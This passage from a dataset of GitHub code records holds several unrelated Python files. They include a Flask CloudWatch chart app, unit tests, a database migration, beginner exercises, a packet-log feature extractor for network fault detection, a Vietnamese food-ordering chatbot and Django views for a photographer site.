torch.mean(cos_sim).item()\r\n print('mean similarity: ', mean)\r\n\r\n return mean\r\n\r\ndef plot(data):\r\n df = DataFrame(data)\r\n fig = line(df, x='iter', y='similarities', title='Similarity to Original Dataset Over Iterations')\r\n fig.show()\r\n\r\nif __name__ == '__main__':\r\n # nltk.download('punkt')\r\n data = { 'iter': [], 'similarities': [] }\r\n extract_number = lambda s: int(''.join(filter(str.isdigit, s)))\r\n for filePath in sorted(glob.glob(f'{SAMPLE_DIR}/*.txt'), key=extract_number):\r\n print(filePath)\r\n similarities = findSimilarity(INPUT_DIR, filePath)\r\n data['iter'].append(extract_number(filePath))\r\n data['similarities'].append(similarities)\r\n plot(data)","repo_name":"abusch8/PlotBot","sub_path":"evaluation/sentence_similarity.py","file_name":"sentence_similarity.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5783006016","text":"import boto3\nimport json\nimport time\nfrom datetime import datetime\n\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\napp.debug = True\n\n\n@app.route('/')\ndef home():\n return render_template('home.html')\n\n\n@app.route('/test')\ndef test():\n # my instance is on this region\n aws_region = 'us-west-2'\n\n # create resource client to amazon cloudwatch\n # http://russell.ballestrini.net/setting-region-programmatically-in-boto3/\n boto3.setup_default_session(region_name=aws_region)\n cloudwatch = boto3.resource('cloudwatch', region_name=aws_region)\n\n # get the metric i need for workload\n metric = cloudwatch.Metric('AWS/EC2', 'CPUUtilization')\n\n # get the metrics for the specified date range\n stats = metric.get_statistics(\n StartTime=datetime(2017, 2, 28),\n EndTime=datetime(2017, 3, 2),\n Period=600,\n Statistics=['Sum']\n )\n\n # get the datapoints from the API call\n data = stats.get('Datapoints')\n\n # create chartjs datastructure\n # http://www.chartjs.org/docs/#line-chart-example-usage\n result = {}\n result[\"datasets\"] = []\n\n dataset = {}\n dataset[\"label\"] = \"Utilization Graph\"\n\n points = []\n labels = []\n\n # add each datapoint to the data array and get label into label array\n for data_point in data:\n points.append(int(data_point.get('Sum')))\n\n # turn timestamp into a unix timestamp number\n dtime = data_point.get('Timestamp')\n labels.append(str(time.mktime(dtime.timetuple())))\n\n dataset[\"data\"] = points\n\n result[\"labels\"] = labels\n result[\"datasets\"].append(dataset)\n\n # convert result into json string and send with template\n return render_template('test.html', chartData=json.dumps(result))\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"murtja/Assignment-2","sub_path":"Assignment2.py","file_name":"Assignment2.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23569789051","text":"from .backtracking import Backtracking\nfrom .mocks import DictTreeIterator\nfrom .mocks import MockObserver\n\n\ndef test_backtracking() -> None:\n tree = {\n \"Algorithms\": {\n \"Breadth-First\": {},\n \"Depth-First\": {\"Backtracking\": {}, \"Beam Search\": {}},\n \"Other\": {\"Monte Carlo Tree Search\": {}},\n }\n }\n\n iterator = DictTreeIterator(\"Root\", tree)\n observer = MockObserver()\n tree_search = Backtracking(observer)\n tree_search.run(iterator)\n\n assert [it.name for it in observer.states] == [\n \"Root\",\n \"Algorithms\",\n \"Breadth-First\",\n \"Algorithms\",\n \"Depth-First\",\n \"Backtracking\",\n \"Depth-First\",\n \"Beam Search\",\n \"Depth-First\",\n \"Algorithms\",\n \"Other\",\n \"Monte Carlo Tree Search\",\n \"Other\",\n \"Algorithms\",\n \"Root\",\n ]\n","repo_name":"martin-ueding/game-simulation-sandbox","sub_path":"game_simulation_sandbox/treesearch/test_backtracking.py","file_name":"test_backtracking.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72975286187","text":"from orator.migrations import Migration\n\n\nclass CreatePortfoliosTable(Migration):\n\n def up(self):\n \"\"\"\n Run the migrations.\n \"\"\"\n with self.schema.create('portfolios') as table:\n table.increments('id')\n table.text('name')\n table.integer('user_id').unsigned()\n table.foreign('user_id').references('id').on('users')\n table.integer('portfolio_id').unsigned()\n table.foreign('portfolio_id').references('id').on('portfolios')\n table.timestamps(use_current=True)\n\n def down(self):\n \"\"\"\n Revert the migrations.\n \"\"\"\n self.schema.drop('portfolios')\n","repo_name":"jhosoume/alpha50_orator_test","sub_path":"db/migrations/2016_07_09_010109_create_portfolios_table.py","file_name":"2016_07_09_010109_create_portfolios_table.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27116712663","text":"# /**\n# * @author Benjamin Peronne\n# * @email contact@benjaminperonne.fr\n# * @create date 2022-10-20 13:33:42\n# * @modify date 2022-10-20 13:33:42\n# * @desc [TP3 - Exercice 6]\n# */\n\n# Objectif : La suite de Fibonacci de manière récursive\n\ndef fibonacci(p_n):\n if (p_n == 0):\n return 0\n elif (p_n == 1):\n return 1\n else:\n return fibonacci(p_n - 1) + fibonacci(p_n - 2)\n\n\ndef main():\n n = int(input(\"Entrez un entier n positif non nul : \"))\n for i in range(n + 1):\n print(fibonacci(i))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"BenjaminPeronne/TP_3_Python_M1info","sub_path":"TP3_6.py","file_name":"TP3_6.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29315093640","text":"#Errors and Practice\n\n'''\n3 types:\n 1. Syntax errors - where the code violates syntax rules for a proper python program\n - detected at compile time\n - program will not run unless they are corrected\n - ex:\n -undeclared identifiers\n -invalid identifiers\n -failure to close a comment or string properly\n -incorrect indentation\n 2. Runtime errors\n - causes a program to \"crash\": an error is reported, and control is turned over to the operating system\n - ex:\n -division by zero\n -getting into an infinite loop, which may ultimately cause a stack overflow\n 3. Logic errors\n - cause the program to compute incorrect results\n -often go unnoticed\n\n'''\n\n\n'''\nMA3 practice problems\n Label each of the following as either \"Python reserved keyword\", \"standard identifier\", or \"other valid identifier\":\n int: standard\n PI: other\n if: reserved\n main: other\n while: reserved\n high_score: other\n\n How should you read the statement: temp_value = old_value + new_value?\n \"temp_value\" equals \"old_value\" plus \"new_value\"\n\n Which Python data type would be best to represent the following? For each blank, you may list int, float, or str only.\n Gender: str\n Average of 10 numbers: float\n Number of students in CptS111: int\n Price of a gallon of milk: float\n'''\n\n#Modules and Practice\n\n'''\nMA4 Practice Problems\n What are the three kinds of programming errors? Can you give an example of each?\n A. syntax error\n B. run-time error\n C. logic error\n\n Rank the order of precendence for the following C operators (1 is the highest precendence and 5 is the lowest)\n + # binary addition\n - # unary minus (e.g. negation)\n % # modulus\n = # assignment\n () # parentheses\n Evaluate each of the following equations and determine the resultant data type:\n 4 / 12 =\n 4 // 12 =\n 4 % 12 =\n 7 // 4 =\n 9.0 / 4.0 =\n 3 / 0 =\n 3.0 % 1 =\n 16 % 0 =\n 3 % 5 =\n 9 % 5 =\n 2 * 4 ** 2 =\n 2 ** 4 ** (2 / 4) =\n Given y = m % n, what are the possible values of y?\n\n Write the following equation as a Python arithmetic statement: $$q=\\frac{kA(T_1-T_2)}{L}$$\n\n Show the output displayed by the following program when the data entered are 12 for m and 0 for n:\n m = int(input(\"Enter an integer> \"))\n n = int(input(\"Enter an integer> \"))\n m = m + 5\n n = 3 * n\n print(\"m = %d\\nn = %d\\n\" %(m, n))\n'''\n\n'''\nPython Modules\n module: a file that contains a collection of related variables and functions\n\n you must import all of the modules before you can use them in your code\n\nMath Functions\n the math module includes many common mathematical functions\n\n common functions:\n fabs() for absolute values\n ceil() for computing the ceiling of a number\n floor() for computing the floor of a number\n cos() for cosine function\n sin() for sine function\n tan() for tangent function\n pow() for raising a number to its power\n log() for logarithms (see also log2() and log10()\n sqrt() for computing square roots\n\nTurtle Graphics\n used for doing GUI stuff\n\nSoftware development method\n six basic steps:\n 1. specify problem requirements\n 2. analyze the problem\n 3. design an algorithm to solve the problem\n 4. implement an algorithm\n 5. test and verify the completed program\n 6. maintain and update the program\n'''\n\n\n'''\nPractice Problems\n 1. Write a program to compute the total price for a purchase after sales tax.\n\n example output:\n Please enter the purchase price: 9.00\n Please enter the sales tax as a percent (%): 7.8\n Total purchase price after tax: $9.70\n'''\n\ndef sales_tax():\n purchase = float(input(\"Please enter the purchase price: \"))\n tax_percent = float(input(\"Please enter the sales tax as a percent (%): \"))\n\n tax = purchase * (tax_percent / 100.0)\n purchase += tax\n\n print(\"Total purchase price after tax: $%.2f\" %(purchase))\n\n'''\n 2. write a program that calculates mileage reimbursement for a salesperson at the rate of $.35/mile\n\n example output:\n\n MILEAGE REIMBURSEMENT CALCULATOR\n Please enter the beginning odometer reading: 13505.2\n Please enter the ending odometer reading: 13810.6\n You traveled 305.4 miles. At $0.35 per mile, your reimbursement is $106.89\n'''\n\ndef mileage_reimbursement():\n print(\"MILEAGE REIMBURSEMENT CALCULATOR\")\n odo_begin = (float(input(\"Please enter the beginning odometer reading: \")))\n odo_ending = (float(input(\"Please enter the ending odometer reading: \")))\n\n traveled = odo_ending - odo_begin\n reimbursment = traveled * .35\n print(\"You traveled %.1f miles. At $.33 per mile, your reimbursement is $%.2f\" %(traveled, reimbursment))\n\n'''\n 3. write a program that takes the values for m and n as input and displays the values of the Pythagorean triple generated by the formulas above\n\n example output:\n Please enter a m value: 4\n Please enter a n value: 2\n Pythagorean triple: 12^2 + 16^2 = 20^2\n'''\n\ndef pythagorean():\n m = int(input(\"Please enter a m value: \"))\n n = int(input(\"Please enter a n value: \"))\n\n side1 = m**2 - n**2\n side2 = 2 * m * n\n hyp = m**2 + n**2\n\n print(\"Pythagorean triple:%d^2 + %d^2 = %d^2\" %(side1, side2, hyp))\n","repo_name":"clairenoel97/CPSC111","sub_path":"CPSC111 - Beginning Python/lesson3.py","file_name":"lesson3.py","file_ext":"py","file_size_in_byte":5554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74988205548","text":"from tests.cases import ModelTestCase, ET\nfrom tests.factories import ParameterFactory\nfrom yandex_market_language.exceptions import ValidationError\nfrom yandex_market_language.models import Parameter\n\n\nclass ParameterModelTestCase(ModelTestCase):\n def test_to_dict(self):\n name, value, unit = \"Size\", \"33\", \"M\"\n p = ParameterFactory(name, value, unit)\n d = p.to_dict()\n self.assertEqual(d[\"name\"], name)\n self.assertEqual(d[\"value\"], value)\n self.assertEqual(d[\"unit\"], unit)\n\n def test_to_xml(self):\n name, value, unit = \"Size\", \"33\", \"M\"\n p = ParameterFactory(name, value, unit)\n el = p.to_xml()\n expected_el = ET.Element(\"param\", {\"name\": name, \"unit\": unit})\n expected_el.text = value\n self.assertElementsEquals(el, expected_el)\n\n def test_value_property(self):\n p = ParameterFactory()\n with self.assertRaises(ValidationError) as e:\n\n class Err:\n def __str__(self):\n return 1\n\n p.value = Err()\n\n self.assertEqual(str(e), \"value must be a string\")\n\n def test_from_xml(self):\n p = ParameterFactory()\n el = p.to_xml()\n parsed_p = Parameter.from_xml(el)\n self.assertEqual(p.to_dict(), parsed_p.to_dict())\n","repo_name":"stefanitsky/yandex_market_language","sub_path":"tests/models/test_parameter.py","file_name":"test_parameter.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"13689166032","text":"# -*- coding:UTF-8 -*-\nimport sys\nfrom collections import defaultdict\nimport os\ndef selfadd2dimDict(theDict, key_a, key_b):\n # 功能:将int型字典theDict中索引对{key_a:{key_b:val}}所对应的值自加1\n # 备注:因为解释器不能确定第一维的索引是否已经存在于字典theDict中,所以对二维字典直接赋值会报错(类似二维数组),需如下做才能成功添加索引对\n\n if key_a in theDict:\n if key_b in theDict[key_a]:\n theDict[key_a][key_b] += 1\n else:\n theDict[key_a].update({key_b: 1})\n else:\n theDict.update({key_a: {key_b: 1}})\n\n\nbrokennode_list=[]\nglobal brokencount\nbrokencount=104\nglobal event\nevent=104\nfor i in range(event):\n path='brokennode'+str(i)\n brokennode_list.append(path)\n##count采样数量需要与feature1.py中的参数对齐\nglobal wind_count\nwind_count=8\nfor path in brokennode_list:\n path_test=path+'/s0-0.txt'\n if((os.path.exists(path_test))==False):\n print(path_test)\n print('A')\n continue\n for i in range(brokencount):\n tcp_source = defaultdict(int)\n tcp_target = defaultdict(int)\n tcp_count = defaultdict(int)\n retra_count = defaultdict(int)\n icmp_source = defaultdict(int)\n arp_source = defaultdict(int)\n arp_target = defaultdict(int)\n pair = defaultdict(int)\n flag = defaultdict(int)\n retra_source = defaultdict(int)\n retra_target = defaultdict(int)\n\n for k in range(wind_count): \n path_txt=path+'/s'+str(i)+'-'+str(k)+'.txt'\n f=open(path_txt,'r')\n\n tcp_source[str(k)] = {}\n tcp_target[str(k)] = {}\n retra_source[str(k)] = {}\n retra_target[str(k)] = {}\n\n ###进行IP-sketch\n ###\n count_tcp=0\n count_pair=0\n count_arp_source=0\n count_arp_target=0\n\n ##tcp_count 对tcp包计数\n ##retra_count 对retra包计数\n tcp_count[str(k)]=0\n retra_count[str(k)]=0\n for item in f:\n keys=item.split('\\t')\n if(len(keys)<=4):\n continue\n if(keys[4]=='TCP'):\n temp_source=keys[1]\n temp_target=keys[3]\n selfadd2dimDict(tcp_source, str(k), temp_source)\n selfadd2dimDict(tcp_target, str(k), temp_target)\n tcp_count[str(k)]+=1\n\n p6=keys[6].strip()\n retra='[TCP Retransmission]'\n temp=p6[:len(retra)]\n if(temp==retra):\n selfadd2dimDict(retra_source, str(k), keys[1])\n selfadd2dimDict(retra_target, str(k), keys[3])\n retra_count[str(k)]+=1\n f.close()\n\n\n for k in range(wind_count):\n path_result = path + '/s' + str(i) + '-' + str(k) + '_1.txt'\n f_result = open(path_result, 'w')\n\n ###对于IP_source和IP_target进行统计\n ###记录结果\n for j in range(1,brokencount+1):\n ###该窗口内的信息\n ###f1:tcp_src占所有TCP的比例\n ###f2:tcp_dst占所有TCP的比例\n ###f3:retra_src占所有retra包的比例\n ###f4:retra_target占所有retra包的比例\n ###f5:是否有TCP包\n ###f6:是否有retra包\n ip='192.168.123.'+str(j)\n f1=0\n f2=0\n f3=0\n f4=0\n f5=0\n f6=0\n\n # 新添加的特征\n is_first_window = 1 if k == 0 else 0 # 当前窗口是否是第一个窗口\n\n ratio_tcp_src_prev = 1 # 当前窗口与前一个窗口中IP_source的比值\n if k == 0 and ip not in tcp_source[str(k)]: # case:当前窗口是第一个窗口,且无IP_source\n ratio_tcp_src_prev = 0\n if k != 0:\n if ip not in tcp_source[str(k)]: # case:当前窗口中无IP_source\n ratio_tcp_src_prev = 0\n elif ip not in tcp_source[str(k-1)]: # case:前一个窗口中无IP_source\n ratio_tcp_src_prev = tcp_source[str(k)][ip] + 1\n else:\n ratio_tcp_src_prev = (tcp_source[str(k)][ip]+1)/(float(tcp_source[str(k-1)][ip]+1))\n\n ratio_tcp_tar_prev = 1 # 当前窗口与前一个窗口中IP_target的比值\n if k == 0 and ip not in tcp_target[str(k)]: # case:当前窗口是第一个窗口,且无IP_target\n ratio_tcp_tar_prev = 0\n if k != 0:\n if ip not in tcp_target[str(k)]: # case:当前窗口中无IP_target\n ratio_tcp_tar_prev = 0\n elif ip not in tcp_target[str(k-1)]: # case:前一个窗口中无IP_target\n ratio_tcp_tar_prev = tcp_target[str(k)][ip] + 1\n else:\n ratio_tcp_tar_prev = (tcp_target[str(k)][ip]+1)/(float(tcp_target[str(k-1)][ip]+1))\n\n is_last_window = 1 if k == wind_count-1 else 0 # 当前窗口是否是最后一个窗口\n\n ratio_tcp_src_next = 1 # 当前窗口与后一个窗口中IP_source的比值\n if k == wind_count-1 and ip not in tcp_source[str(k)]: # case:当前窗口是最后一个窗口,且无IP_source\n ratio_tcp_src_next = 0\n if k != wind_count-1:\n if ip not in tcp_source[str(k)]: # case:当前窗口中无IP_source\n ratio_tcp_src_next = 0\n elif ip not in tcp_source[str(k+1)]: # case:后一个窗口中无IP_source\n ratio_tcp_src_next = tcp_source[str(k)][ip] + 1\n else:\n ratio_tcp_src_next = (tcp_source[str(k)][ip]+1)/(float(tcp_source[str(k+1)][ip]+1))\n \n # print(k-1)\n ratio_tcp_tar_next = 1 # 当前窗口与后一个窗口中IP_target的比值\n if k == wind_count-1 and ip not in tcp_target[str(k)]: # case:当前窗口是最后一个窗口,且无IP_target\n ratio_tcp_tar_next = 0\n if k != wind_count-1:\n if ip not in tcp_target[str(k)]: # case:当前窗口中无IP_target\n ratio_tcp_tar_next = 0\n elif ip not in tcp_target[str(k+1)]: # case:后一个窗口中无IP_target\n ratio_tcp_tar_next = tcp_target[str(k)][ip] + 1\n else:\n ratio_tcp_tar_next = (tcp_target[str(k)][ip]+1)/(float(tcp_target[str(k+1)][ip]+1))\n\n \"\"\"\n if(tcp_count!=0):\n f1=tcp_source[ip]/tcp_count\n f2=tcp_target[ip]/tcp_count\n #f1=tcp_source[ip]\n #f2=tcp_target[ip]\n f5=1\n \"\"\"\n if ip not in tcp_source[str(k)]:\n f1 = 0\n else:\n f1=tcp_source[str(k)][ip]\n if ip not in tcp_target[str(k)]:\n f2 = 0\n else:\n f2=tcp_target[str(k)][ip]\n f5=tcp_count[str(k)]\n if(retra_count[str(k)]!=0):\n if ip not in retra_source[str(k)]:\n f3 = 0\n else:\n f3=retra_source[str(k)][ip]/retra_count[str(k)]\n if ip not in retra_target[str(k)]:\n f4 = 0\n else:\n f4=retra_target[str(k)][ip]/retra_count[str(k)]\n f6=1\n try:\n f_result.write(str(j-1)+'\\t'+ip+'\\t'+str(f1)+'\\t'+str(f2)+'\\t'+str(f3)+'\\t'+str(f4)+'\\t'+str(f5)+'\\t'+str(f6)+'\\t'+\n str(is_first_window)+'\\t'+str(ratio_tcp_src_prev)+'\\t'+str(ratio_tcp_tar_prev)+'\\t'+\n str(is_last_window)+'\\t'+str(ratio_tcp_src_next)+'\\t'+str(ratio_tcp_tar_next)+'\\n')\n except:\n print(ip)\n f_result.close()\n","repo_name":"yelianjin/PUFF","sub_path":"feature2.py","file_name":"feature2.py","file_ext":"py","file_size_in_byte":8380,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25750937729","text":"import tensorflow as tf\nimport json\nimport numpy as np\nfrom tensorflow import keras\nfrom keras.models import load_model\nimport random\nimport time\n\n\nfrom MachineSimilarAnswser import *\n\nclass_names = [\"LIỆT_KÊ\", \"ĐẶT_MÓN\", \"THAY_ĐỔI_MÓN\",\"END\"]\npath_input = './model/Model.json'\npath_save_model = '.\\data\\ModelClass.bin'\npath_test = './data/NewTFIDFOne.json'\npathMenuFood = './data/DataMenu.json'\norderItemTam = []\n\ndef train_model():\n with open(path_input, encoding='utf-8-sig') as json_file:\n input = json.load(json_file)\n\n random.shuffle(input) # random mảng dữ liệu\n arr_train = []\n label_train = []\n arr_test = []\n label_test = []\n indexTest = []\n i = 0\n\n for element in input:\n length = len(element['data'])\n i = i + 1\n # print(element['label'])\n if i < 3000:\n arr_train.append(element['data'])\n label_train.append(element['label'])\n else:\n arr_test.append(element['data'])\n label_test.append(element['label'])\n\n train_sentences = np.array(arr_train)\n train_labels = np.array(label_train)\n test_sentences = np.array(arr_test)\n test_labels = np.array(label_test)\n model = keras.Sequential([\n keras.layers.Flatten(input_shape=(length,)),\n keras.layers.Dense(128, activation=tf.nn.relu),\n keras.layers.Dense(len(class_names), activation=tf.nn.softmax)\n ])\n\n # config model when train\n model.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\n model.fit(train_sentences, train_labels,\n epochs=500) # epochs: so lan train\n if len(test_sentences) > 0:\n test_loss, test_acc = model.evaluate(test_sentences, test_labels)\n print('\\nTest accuracy:', test_acc, 'loss: ', test_loss)\n print(test_sentences, test_labels)\n # if test_acc > 0.8 :\n # model.save(path_save_model)\n # return\n # else:\n # return train_model()\n\n return model.save(path_save_model)\n\n\ndef predictSentence(sen):\n sen = chuyen_doi_chu_so_thanh_so(sen)\n vectorInput = createNewTFIFOneSentence(sen)\n vectorInput = np.asarray(vectorInput)\n start_time = time.time()\n if 'model' not in globals():\n global model\n model = load_model(path_save_model)\n if 'orderItemTam' not in globals():\n global orderItemTam \n predicted = model.predict(np.array([vectorInput, ]))\n index = np.argmax(predicted[0])\n print(word_segmentation(sen, False), \": dự đoán max ==>\",class_names[index], predicted[0][index])\n weigth = predicted[0][index]\n data = {\"context_question\": \"Vui lòng thử lại\", \"tag\": False, \"End\": False}\n if weigth >= 0.7:\n action = \"showList\" # hiển thị danh sách\n Food = \"null\"\n num_oder = 0\n data = similarListToken(sen, index)\n if index != 0 and index != 3:\n Food = detectionListFood(sen) # lấy danh sách các món ăn\n action = detectionDetailAction(sen,Food) # lấy danh sách các hành động\n num_oder = detection_number(sen,Food)\n print(\"order\",num_oder)\n print(\"action\",action)\n FoodArraySort = [] \n for i in sorted (Food.keys()): \n FoodArraySort.append(Food[i])\n Food = FoodArraySort\n num = 0\n print(\"Food\",Food)\n if len(Food) > 0 and len(num_oder):\n if len(Food) == len(num_oder):\n for i in range(len(action)):\n num = num_oder[i]\n if action[i] == 2 : # xóa hết hóa đơn\n if num == 0:\n deleteFoodInOrder(Food[i],False)\n else :\n deleteFoodInOrder(Food[i],num) \n \n if action[i] == 0 : # thêm vào hóa đơn\n AddFoodInOrder(Food[i],num)\n if action[i] == 1: # giảm số lượng dữ thức uống hóa đơn\n GiamFoodInOrder(Food[i],num) \n else:\n for i in range(len(action)):\n num = num_oder[i]\n if action[i] == 2 : # xóa dữ liệu\n if num == 0:\n deleteFoodInOrder(Food[i],False)\n else :\n deleteFoodInOrder(Food[i],num) \n if action[i] == 0: \n AddFoodInOrder(Food[i],num)\n if action[i] == 1: \n GiamFoodInOrder(Food[i],num) \n else: \n return {\"status\":False, \"End\":False,\"data\":[]} # không tìm thấy món ăn\n print(\"Hóa đơn\",orderItemTam)\n return {\"status\":True, \"End\":False,\"data\":orderItemTam}\n\n if index == 0:\n \n Food = data[\"context_question\"] # Loại liệt kê\n if index == 3:\n return {\"status\":True, \"End\":True,\"data\":orderItemTam}\n else:\n print(\"Không hiểu\")\n return {\"status\":False, \"End\":False,\"data\":[]} # trường hợp không phân lớp\n\n\ndef UpdateNewQuestion():\n path_input = \"./data/ListSentenceNotVaild.json\"\n list_data = get_data(path_input)\n listAnswerQuestion = []\n # \"tag\": 0,\n # \"content\": \"Kẹt xe\",\n # \"context_question\": \"Bạn có thể nói rõ hơn được không?\"\n for data in list_data:\n content = data['content']\n # listAnswerQuestion.append({\"tag\":data['tag'],\"content\":data['content'],\"context_question\":data['context_question'],\"End\":False})\n Class = predictSentence(content)\n lable = Class[\"label\"]\n weigth = Class[\"weigth\"]\n\n if weigth >= 0.9:\n data[\"newtag\"] = int(lable)\n data[\"nameLabel\"] = class_names[lable]\n if \"context_question\" not in data:\n data[\"context_question\"] = \"Tôi chưa hiểu câu nói của bạn\"\n if \"End\" not in data:\n data[\"End\"] = True\n listAnswerQuestion.append(data)\n with open('./data/UpdatelistAnserQ3.json', 'w+', encoding='utf-8-sig') as json_file:\n json.dump(listAnswerQuestion, json_file, ensure_ascii=False)\n print('write: thêm key vào json thành công!')\n\ndef deleteFoodInOrder(food,num):\n if num : \n for i in range(len(orderItemTam)):\n item = orderItemTam[i]\n if food[\"name\"] == item[\"name\"]:\n orderItemTam[i][\"num_order\"] = orderItemTam[i][\"num_order\"] - num\n else: \n for i in range(len(orderItemTam)):\n item = orderItemTam[i]\n if food[\"name\"] == item[\"name\"]:\n del orderItemTam[i]\n\ndef AddFoodInOrder(food,num):\n if 'orderItemTam' not in globals():\n global orderItemTam \n # print(\"Gọi hàm add food\")\n if len(orderItemTam) == 0:\n orderItemTam.append({\"name\":food[\"name\"],\"price\":food[\"price\"],\"num_order\":num})\n else:\n print(orderItemTam)\n checkHave = False \n for i in range(len(orderItemTam)):\n item = orderItemTam[i]\n if food[\"name\"] == item[\"name\"]:\n checkHave = True\n print(\"thêm food\",num,food)\n orderItemTam[i][\"num_order\"] = orderItemTam[i][\"num_order\"] + num \n if not checkHave :\n orderItemTam.append({\"name\":food[\"name\"],\"price\":food[\"price\"],\"num_order\":num})\n\ndef GiamFoodInOrder(food,num):\n if 'orderItemTam' not in globals():\n global orderItemTam \n # print(\"Gọi hàm add food\")\n if len(orderItemTam) == 0:\n orderItemTam.append({\"name\":food[\"name\"],\"price\":food[\"price\"],\"num_order\":num})\n else:\n print(orderItemTam)\n checkHave = False \n for i in range(len(orderItemTam)):\n item = orderItemTam[i]\n if food[\"name\"] == item[\"name\"]:\n print(\"giảm food\",num,food[\"name\"])\n orderItemTam[i][\"num_order\"] = orderItemTam[i][\"num_order\"] - num\n\ndef detection_number(sentence,Food):\n sentence = word_segmentation(sentence,False)\n arrNumber = []\n if len(sentence) > 0:\n for word in sentence:\n if word.isdigit():\n arrNumber.append(int(word))\n print(arrNumber) \n return arrNumber\n\ndef detectionDetailAction(sentence,Food):\n data = dict()\n # thêm số lương\n data[\"thêm\"] = 0\n data[\"đặt\"] = 0\n data[\"cho\"] = 0\n data[\"tăng\"] = 0\n data[\"chọn\"] = 0\n data[\"mua\"] = 0\n data[\"lấy\"] = 0\n data[\"gọi\"] = 0\n data[\"cập nhật\"] = 0\n # giảm số lượng\n data[\"bớt\"] = 1\n data[\"giảm\"] = 1\n data[\"giảm bớt\"] = 1\n data[\"ít\"] = 1\n data[\"bỏ bớt\"] = 1\n # xóa số lượng\n data[\"bỏ đi\"] = 2\n data[\"xóa\"] = 2\n data[\"bỏ\"] = 2\n # print(\"số thức ăn trong câu là\",len(Food))\n sentence = word_segmentation(sentence,False)\n arr = []\n countAction = 0\n for word in sentence:\n if word in data :\n if countAction < len(Food):\n countAction = countAction + 1\n arr.append(data[word]) \n # print(\"số action trong câu là\",len(arr))\n # if len(arr) < len(Food):\n # for target_list in expression_list:\n # pass\n # arr.append() \n return arr\n\ndef chuyen_doi_chu_so_thanh_so(sen):\n dict_chu_so = {}\n dict_chu_so = {'hai mươi mốt': 21, 'hai mươi hai': 22, 'hai mươi ba': 23, 'hai mươi bốn': 24, 'hai mươi lăm': 25, 'hai mươi sáu': 26, 'hai mươi bảy': 27, 'hai mươi tám': 28, 'hai mươi chín': 29,\n 'mười một': 11, 'mười hai': 12, 'mười ba': 13, 'mười bốn': 14, 'mười lăm': 15, 'mười sáu': 16, 'mười bảy': 17, 'mười tám': 18, 'mười chín': 19, 'hai mươi': 20, 'ba mươi': 30,\n 'một': 1, 'hai': 2, 'ba': 3, 'bốn': 4, 'năm': 5, 'sáu': 6, 'bảy': 7, 'tám': 8, 'chín': 9, 'mười': 10}\n\n sen = \" \".join(sen.split()) # Chuyển nhiều khoảng trắng về 1 khoảng trắng\n for key in dict_chu_so:\n if key in sen:\n sen = sen.replace(key, str(dict_chu_so[key]))\n return sen\n\n\ndef detectionListFood(sentence):\n sentence = sentence.lower()\n listFood = dict()\n # print(\"câu truy vấn \", sentence)\n with open(pathMenuFood, encoding='utf-8-sig') as json_file:\n input = json.load(json_file)\n for food in input:\n nameFood = food[\"name\"].lower()\n index = sentence.find(nameFood)\n if index >= 0:\n listFood[index] = food\n\n return listFood\n\n\nif __name__ == '__main__':\n # newSen = chuyen_doi_chu_so_thanh_so(\"Tôi muốn bớt mười lăm món Bánh phô mai cà phê\")\n listFood = detectionListFood(\"Tôi muốn bớt món Bánh phô mai cà phê\")\n print(listFood)\n # train_model()\n # num = detection_number(\"tôi đặt 5 phần bún thịt nướng\")\n # print(\"số lượng \", num)\n\n # predictSentence(\"tôi bị bệnh\")\n # ms.similarListToken(\"tôi đi vá bánh xe\", 0)\n # UpdateNewQuestion()\n","repo_name":"poscantho24a3/dtu-cse","sub_path":"responsechat.py","file_name":"responsechat.py","file_ext":"py","file_size_in_byte":11330,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21639504225","text":"from django.http import HttpResponse,HttpResponseRedirect\nfrom django.shortcuts import render, redirect,reverse\nfrom .forms import *\nfrom .models import *\nfrom django.views.decorators.csrf import csrf_exempt \nfrom django.contrib.auth import authenticate,login\nfrom django.contrib.auth.models import User\nimport random\n\nfrom django.contrib.auth import logout\n\ndef logout_view(request):\n print('logout view called')\n logout(request)\n #return render(request,'photohireapp/logout.html') Option 1\n return redirect('signin')\n\ndef user_profile(request):\n print('inside edit profile')\n if request.method=='POST':\n print('inside post' , request.POST,'>>user',request.user.id)\n form= editprofileform(request.POST, instance=request.user)\n if form.is_valid():\n print('form is valid')\n bio=form.cleaned_data['bio']\n user=User.objects.get(id=request.user.id).id\n print('User ' , user)\n print(bio)\n update=Profile.objects.filter(user=user).update(bio=bio)\n print('update ??' , update)\n #form.save()\n else:\n print(form.errors)\n else:\n form=editprofileform(instance=request.user)\n\n return render(request,'photohireapp/edit_profile.html',{'form':form})\n\t\ndef home(request):\n images = list(Images.objects.all())\n photographers = list(Profile.objects.filter(is_photographer=True))\n\n # Shuffle lists\n random.shuffle(images)\n random.shuffle(photographers)\n\n # Get first 3 from the shuffled list\n top_photographers = photographers[0:3]\n\n # Return all images and only 3 photographers\n return render(request, \n 'photohireapp/index.html', \n {'images':images, 'top_photographers':top_photographers}\n )\n\n\ndef explore(request):\n images = list(Images.objects.all())\n random.shuffle(images)\n # Get top 10 photographers based on their profile views\n trending_photographers = Profile.objects.filter(is_photographer=True).order_by('-profile_views')[:10]\n return render(request, \n 'photohireapp/expore.html',\n {'images':images, 'trending_photographers':trending_photographers}\n )\n\n\n@csrf_exempt\ndef signup(request):\n if 